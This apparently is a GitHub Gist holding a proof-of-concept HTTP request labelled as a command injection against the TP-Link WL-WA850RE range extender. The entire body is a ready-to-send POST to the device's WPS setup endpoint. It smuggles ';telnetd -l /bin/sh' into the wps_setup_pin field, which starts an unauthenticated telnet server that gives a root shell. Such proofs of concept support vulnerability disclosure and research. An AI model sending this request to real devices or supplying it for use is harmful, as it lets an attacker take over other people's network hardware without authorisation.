Last active
February 19, 2019 19:44
-
-
Save eacmen/1ff808f5f1c3cc68cfb89d1078e772b0 to your computer and use it in GitHub Desktop.
TP-LINK WL-WA850RE Example Command Injection HTTP Request
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /data/wps.setup.json HTTP/1.1 | |
Origin: http://192.168.0.254 | |
Content-Length: 100 | |
Accept-Language: en-US,en;q=0.9 | |
Accept-Encoding: gzip, deflate | |
Connection: close | |
Accept: application/json, text/javascript, /; q=0.01 | |
User-Agent: Mozilla/5.0 | |
Host: 192.168.0.254 | |
X-Requested-With: XMLHttpRequest | |
Referer: http://192.168.0.254/ | |
Cookie: COOKIE=456787465784 | |
Content-Type: application/x-www-form-urlencoded; charset=UTF–8 | |
operation=write&option=connect&wps_setup_pin=12345670;telnetd -l /bin/sh |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment